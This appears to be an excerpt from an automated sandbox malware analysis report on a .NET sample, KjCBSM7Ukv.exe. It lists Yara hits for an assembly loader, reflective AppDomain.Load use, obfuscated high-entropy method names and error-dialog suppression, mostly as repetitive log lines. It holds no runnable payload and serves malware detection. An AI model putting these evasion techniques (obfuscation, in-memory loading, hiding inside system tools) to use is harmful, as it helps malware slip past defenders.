Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: kn96RDglqorjf7OGrgep9jqrEo1y4IgqRA9YHkWPq9Ekr4zVOsaQ0HaxE5H8iaPg2FykMDjnnaHO2EI2K5hldnsFFSAuN System.AppDomain.Load(byte[])
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	.Net Code: kn96RDglqorjf7OGrgep9jqrEo1y4IgqRA9YHkWPq9Ekr4zVOsaQ0HaxE5H8iaPg2FykMDjnnaHO2EI2K5hldnsFFSAuN
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.KjCBSM7Ukv.exe.4430000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.4359f38.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.26950a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.26950a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.4381f58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.5a30000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.4359f38.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KjCBSM7Ukv.exe.41602b8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1661567494.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1662763939.00000000063D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.000000000268E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1650015728.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1652553493.0000000004160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KjCBSM7Ukv.exe PID: 6916, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Code function: 1_2_01656A45 push eax; iretd

1_2_01656A69

Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, spIgdAVKzYKo3gxf35lM9RbEUi3MbpZ0iN4U4EiA4c6ZYFvFA5acMsAsK35OXv55Fwr1R3tXMeVnX2.cs	High entropy of concatenated method names: 'Ii4604e1aF6Pmp4xImMcZ8PMKyRJI9D6a3VKfhSWRoLouAz0Q8xa9sbER8iIYcSsu2OlU2oSmgg3Iv', 'GFSr5uvITDVIGWNdzKSjDNGAO5wWBZgBGyh3jJJK2EQkvCQB9gJNj2m53PupdkPBHzaMZBTcDJHG8G', 's7NEjslk17WSVL5yDBlcmn6itFjgFU19ql7Fi9gxoIXZKpbpalY50ZKe0MtqNhdVp9PZYm4jzJQRCm', 'rzVQXXgtq4PAhccyWUx7D', 'PSVwohbSHrh5WSLjPI9ej', 'YKIFgPJaSWNwbuxPhAmyS', 'uUWoFH4xYPbaN4R9FdF2E', 'ozryzmNgkB626nzKc7X1o', 'Ef2AkmRRyVaOyFvPx5J6b', 'VhRcstUTM0kosdfogxonO'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, BmbcNrp9UKDIVUXMDLIMRgdU6CWuOqCWzbQECkn78bNMFxwsPPgnTiGV9WQ7Tb6xuGgbkHFaCFja9nJFqeUQwrunePyOH.cs	High entropy of concatenated method names: 'CAFZozUzf9Zd9t63w0xWiFi6yZQEPZxaKSXIcDbF9lbpVMk18EtdZZjPXR0ECx9wYCkxmag8iQ7epV', 'iuj4zxKbRI10MRD9RzKMsQJ5T7z2h9d96xVcHrrO4ebpdq0YKA5IGZlWcCa1rqEtAbv7HXwaXmBY0F', 'MWYeSkfnK6mrCQoOnzgmvfWxzkBef4zopZtq5A6KuE3NON6GvTxhVrbRnH7HsboJ5zlKltmLXupcqh', 'UBD34Awc8fXqRYB4vgJIeYcOuj7L5aDcphLVmd8DQirXQj3dT76fGGtqNQvANuy3ZIDum0baCXr5NV'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, qvVlJlZDr0Sny4F1G7zPVbAP6Rrup8xZYlnUw9SkLn7CMt6IUnuWp6Hlhn2GZuG8uejZTQ08XJnq0FTTSkW9BF857pvsL.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'LA7BoHfi5DwtTjPwOvozPPVSvTHG3Pl41hqOjU3wSK6ALraDQFm89fjn88oNfJEHSWMzH4t5Crm9hm', 'cQJSs6ZpsufvX3nQkVi2ZVVnsgPooYAAXZ3IAezqIhVACF4jaoeUQ4zlwkbyULrUB7D8uM8ZilRUUZ', 'fY8CCoJmq5u9nNULOwBcbWL3erX2angSLNECZpI8VKYEdkkI9kfe8qtxBHnGtKtWdX6H2X0N5umKdE', 'TJTPCBfsp0vqUuAGUPTeIkBdFCYRVaK7d5GEIYJLJb5NIcKSYVcaiFc0n5TyOLEbiOZz4OIa5JQFz9'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, Q60Zn6xFubhiwuraExcDn2ijwJuxRg2iSSxBEamkXk2UfRlsW1D3zHfmTK71LcmEa3qUT7YU2p7u1zipHXSlC4Ra6p139.cs	High entropy of concatenated method names: 'HaObHHWE8qI9AyyUsJRN63sIdsJUqjLJohPEVToH4P01xshDjjCwmtVsRRRqiED7AsMN95kmhOqOUZ5ABRHcKYflNIIpr', 'FH2YKFKToWuD3gmHslCqJkxfa7Hz6WIsu4pzu2P3ITxitaqWYVoAOEROJYe00yo8s4xJq51Pbhpo7iOMb7hjfi4CsfOdU', 'es35mn0WJ4zF8Vr6DuUnFJ0NrzYLrFz1rIqmwA8cTwQEzl6W4wawfJwKsx6QI3X6vt3iAWCVhqjYhGXuJ4oewXAegn7zq', 'dIX0jLlq5U7anG0ipRxONtGXXQKiSli0aT08HqPcznaRquY6pSVfTUzF3e97D3BfFWCLQVJ557gggf7gHkHqTv1K9IDvQ', 'HwvzSV5EBbFxjF5HHxRSFYcjMTljuiBxaNM8suqTzIEIYGHEwoYW8AblmP5yywa2I0RGkmwkc99QAifyFKbPcSlY3A9cn', 'mjFSlwdyYRm925ObpeH0mZ4yDMqS0qRkd3FLwBkBNczIdDf07UIjbWB19xTLLVmEtyQhEhrTumyJEKvITDnbS3ND4QewW', '_3B60ygMVKkaPdK0z9ex0IjUvODfg1vDunF86VgZ4Dye2KY1dlFfU37PHdboP7MrSq2yxOQ4g3OuqKLpWzdJnCmBdU1pgm', 'jWaKJ1HSmE75kaPM9Af4Otc2eFYbq72WuFIyxlFxyaubJ16nYOJq0KzDl15oVDph49FKI3D7R867qId7tuYRZHWlnd4F9', 'OawLwhLLXYt0qplwMJRHrJdSkeKybSVPAujJ8RPDUDVAE7VaHB3jj87R11jhE2N2JdIoFR5mLT2UQdPWtC7DG22tfGLFo', '_3YPs4hu77fC9cGRD2OQExWxy2nWidHkWf5ER8A3Vu9NVwOeIMdjicVghFpm6495mzGNQPpuNJR9W3u6LedyCkBLz2E1XX'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, E82QoNmOZf4HIIO7HiT6rnL8gaPd4gt0PHOeqpPWp8SJWRqcriTPoZ8MmcOcvvlKl0bXiJNYBd7C70.cs	High entropy of concatenated method names: '_4MAYSCLZUfLXWr1ZAK5m7bLTsxxqqrlKu9j6IUXetevgd0DKXEO6h26Udi7N8FniVFHuAOmg5omZp8', 'Ig2WOVZ7Lq4qdvIY2738KY2KsJVhhqSlvVo5ww8MlZJU9VwrlaE9RMrvAb8vYWWI33sWJisFioA6hX', '_6Ktp9sMYX59TEdHmoSCYBmuo3hFJGtwHCsLKE1lJEBmiTkbdtnXmfoVuKG8uvTckzoIsI22kj5VNOQ', 'J38KPaUZs8WFqDEAAtxl7', 'AezvXVkcgOdEjBUupUjTU', '_7ZDlvuXA86ghEbB5pIFb5', 'iLLWF82zNmMs7PveewK2g', '_0f5XPvTU8RyWxT43BAQad', 'NpHvfhuulRu4kHZ8roRkK', 'l5zameYtMluC4ZgnUL3el'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, ICNhUEC49XYePafhHkU9bNM74HFLRmpWda3g4FlCDSetuYw9rAjWICE3BOqjQyOJKckJ79LNQ2mCW4.cs	High entropy of concatenated method names: 'ZhHTeSxHzdBN8EybO6wyBxlfgloueQ0b8HB4FZc6DX10G5yX2FP4xN6t7kygnEFifmVfT2L7glnJ80', '_70BNbPfVJnNiDoL33NQTLiTqGpyHGc9hagv8xPn14nNWaqOHaMexLc1xrtBRGOXtbvjNM2JHLI5dRO', '_3Ckb6LGe4cwpnt88kptwxJeE534iDBG0j62SakM0yC5wIGjbksRmgQV3vj0WnZyy8Dim9C6w2WjHOo', 'U5exNRbcJowQCzw78hBMEDC9BHpw8vdQQGGAY8qZx8TTGuuR2mv9o5X79TglhEbAg37RgD6SCrE6um', 'qnkIvk8wZscjA3MPrvLVl1aYLsppqdkzDMk8gXDUwWnH3iICb3jPURzs4Q3PdiywkhCsNJFzsdsfRf', 'uHXYrDBo9MKqVciYsC6qAoAjPS6bNHmKJdcvUNx8ZL2miSWccPVRjfNdqiXBVBR5sTVavIisRXWW8D', 'srVuSX3Me0cfZb3KBx47W54ufOyFvt9eR72Cd0FGUlcw5bm80FvbhGfUDiIwO8BLMbAjSwAa5A3E12', 'tWBf4S8hRKFmfsbKtvvtAbBtuDKCxlNUBHOuSH5TR1DLYnWDArRdvRMYOKvAOban5Q7fUFx26GjNGy', 'dpOSyOQfsWrZ3jfASFXP07qLQ3RFyj4tGujsd57NisN38aw9O9UgMTY025doTs591drsrV8JV8LcGE', 'lTIoKCtp9nNfGKgNpnK9w7oAnbhuHqe4T3TEv7r0qxFPmCpsdBNKELrSBbiESrMppYfN4WfxHinurm'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, P3QNHTebhUTJn6Wgte6XhlSUgveTd3ige2yrBhaNzrxnt10B7R27wqWJVbiztnTiUxSPhCXLkaV7zt.cs	High entropy of concatenated method names: 'tl18V5cS3Xc5rsw4GwldtK5v56MwgIRlWmp8xT8K4g2xRB7AdDODnNOwL7o9IZDYjwCAvPSmS5pj4M', 'wJQ20Hcw6Xuyrx3MQNWCLixf6M05DCClT19YNXuApaGbQ6pb5yFRiTgbE3NeS9jaW4XMNNcX4FOeEz', 'oZcCo77IWP2hORto8yWhPgrbT2NwGtXf8TvDYfS7nxw6jM8M5PR4qJrMHdDDjSHVRL77kNnpm9CMhk', 'tP7bYTKPvk5wH1YeJzFu8', 'pqHY3NfyCS3dznIzEkOUm', 'gCVUzSOa7rMeTi2EcRQSo', 'VHq2D79g6kTnwUtWxR5EV', 'mICjSzNnshS5wVChAE627', 'pGLxCjIojLmtCQLZn0hdb', 'qbOyEvhQGfjK1JilGBAu5'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 5wiSm7EBxTiBGFt8wGsQtht05lGypg973Cwdja1k8SQ7eYKeLIebuVUnvH5O81s6OtAntxFmjFw4gZzvtN6yzBZyRxuCw.cs	High entropy of concatenated method names: 'g7yxGRGGBhln30VYH9hoUNeDM9a8wqcKYv0LfotVwUgtSubO6AyPgn83NX3JLQ1T3YfMqcYOi1Y4UcZTbxBHYPurBrAu3', 'RoOwIgv14BDSo8hGtE9pEEFolIBstnU9h01jfvlBjC3VQm6mOJgWIQpjGZz9g80svnJ4fJiI7bG7Qp0h8LjfMR3JVOZ8Q', 'fMfyv3oAp0Qgea1m7Vh2vGWifxW5CTNkNJ9GUOk2mkEetbSK5o0C3PCZ7OzlICXdJRTB0HthqVBTvOEgCbXRtsjW1KQu7', '_5JeouvyDslZtuG6BCaIPQrSo7jSWEB6rGqX8hhmRAj9xDvqUMJzCFjaKFzrmjX817dzEwaDt8tJ1qqpJmCYee77KcNC35', 'tcwDOXP34syeIdqExS5j0lXVgyyYSpOo2mhcj5EV94gerILMuLbX39gKHEjAoLhrPLJMIKCxLY8qS1pgyRsvjBe2o0qZR', 'sQuBskSrSGNBFWzCZb6dz6IbB3RGXNwP3fpj1yuNc4f1M5U9y88VsXcCiB9s9rZp8L1eFwofEf4Xau9LNgu2yqfIhKchJ', 'MAXkVEy7r7j1BeSaTaHejwcz1i38sxmfXzRYaL5YfjArQKpfgbZip26vFfYxrqSdrr0kaG9HqiVte7v49Nq1GV88vuB6V', '_6iQE2RKQgre0NUZWLbk3O12JxPeC0DLyHXqroMn14knw1wXGhauY1E2baaOshWJXKzNk4F6mEGWnqjhhdnv7J7CHbA2dd', 'lhcBTjpo9mqG1UF36bv8LJWNtL5S3cJPLBz2DIfYSEtCC1MTtB1BGw7XJLfxueobpbJBlQszWdUskIwHw5JBuHajw2wpC', 'HwbwHJIE59X7owMSlPF9bE1Ru5ns0IS8bRz6Lmo54dm6AyhfR1z9Qo5qRLF6cd2VSEEqnCffsCUmMEo6Fe6azSlsgePDQ'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, Lof5uhYcyFa0fioPYjKPe99cqLRTqzxK8RWKufv2mhMg2yKOdlgd1RBJbAkO4QLvObNqtKI8efoDiLDVG14Z07NKOIjFM.cs	High entropy of concatenated method names: 'GQFHxjh4relEjLLVWukRRy65rvv3cviO2KluqrB3plnm6Tmkz4uO0Z0ZiyJ92MvgtmIPefhsrTWg0E0DkqVOrjH0qKHJb', 'CxtgTmXOqfN75RxTlbWgsCpCHMEUirCSRjlcrDfvKS9mnJhwuBoj2BueacLWEqDrLpV3OzXIqD9FE1ak7A6icJsDGZFsi', '_1ozH2Z5ekqbpcOfqPWp2gLWbxx1fxooB7eWHhy4uIiFpFwE0jiSzzVl7JoWbgdybaaQqxRYzCwqP85TgEebaMxJYGEtmO', 'HJWL2FSItf6nSqnjAb2hF1NwA0JUF5y2zzZMOz3g4Ef9PlKobhn0HN0wxK5x2fyQT00vuZsuZQv7v7YNiooanAj9ZQ3cj', '_56qdoKQcSObDwzryo2WJZroQdvi2irXbdJfZHmNsw7F9yEuNqkbgpWp8Zfvrov1eBcNuUMxNcJ1H0Z8mZUSahG6tk1J0T', 'N1mNFG5jM2F0LMozF1Vte4TVc6RiQAsuMLQYEfuzdna2TNJJ8a2fwLAatsPmgShGxHQYvbT5L0lYP1TgZoea2XWwdWnrL', 'mEFEr2TvvvKlIiBcYOvMFxd6XPfFPEjQhdsuH3JbmR1n8SIaktuktnzh9w9dSiA65VVju036W1UUPOMJYDODvGrWFrqst', 'U8Fq6qyNDteRbWr1vA3eO7jlWNWaEaMm4g249mDaWCWAPAIfyCpFWXn07HIDVOpMbYjl5yl2u2BSjUZtUWF253DPc51lv', 'A9GLzDs3uZXNhen59OriZpSyWBC0tqKAsqlrldctNZ5mPOJUqRQGMKSzx3oBTKKKOfIgRjzFsqxajTtHnjNc0SBYX25ce', 'aU7KkJkmKX9auy8bQt0uCCv2i5vLRqDy2oIGvl2Y13T76WXNGsjVKLFTqiYux1GuKziwFJeBYIh01Q5xnBGTuNcmuWFG5'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, 55WGExtdPFTFcXPQCATisRiqB5DcSyba2zwYvXUE894St4doBFa2JUbinHIbyKpa8TjbcEQz5P9meu.cs	High entropy of concatenated method names: 'fBNcOtV6thM1vJWYdvU3j6IcK4ied4ujxXis5fhigtl0XEpk9U7lLxEzkNj5c2lfON3ktf051EnFK8', 'RO0RWVEgIVjnqI3AoBd8howWJ077tQAoYeytwbSlj4qenWq7ZYqUm9gs9TEdL0LneEMk1RvZ2XtAU8', 'XYmbYIIUG8HfEtRQcMlOGFOMjOzDkCQdwTDMWOvTQb9F1S33S8fMIJO3ZdEXW5S5drrMBMzfZWG4hZ', 'AA5FbMEmRF0Q2CfW2tRfIAmYj0KcHf7zEx565JF5ZDDFn2auEtiucGR3X7wdjiZPVtYzpQBoSYwvph', 'SaWSrGxCyrEY2MrnzdSpf', 'yxUzCYn4LCnrxOPTRt4KQ', '_2Kaa8xgdJvnAfArLUQaJi', '_7aWtHN4qXg8cpW65dJ7GP', 'RjOaJiRaNOf5I1wF3d33v', 'qUpfQP53LfvzNqo3FFlse'
Source: 0.2.KjCBSM7Ukv.exe.276bd60.1.raw.unpack, ssgag3T7mIN41nJTdxiIlJDOyE3pMd5g6WEB7TgSwXVvrgjStRWBeAg5mJ8h87x3O364SxNZMwKgyL.cs	High entropy of concatenated method names: 'UypUUbau1ZinT0UXzYZxdvfrDzGWsmwg0AKw6yZFw0OLobdVIyDS5u7I0SVPS0tlutlHFt2K3glxFt', 'tsFnM0w5hNUPxZ2EvXnE1', 'IakdJ6fSfmI1pPLrEG00a', 'vSaJF76rzFsGFiak4a80N', 'j3BWlhAuCFRf19robiRmS'

Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KjCBSM7Ukv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
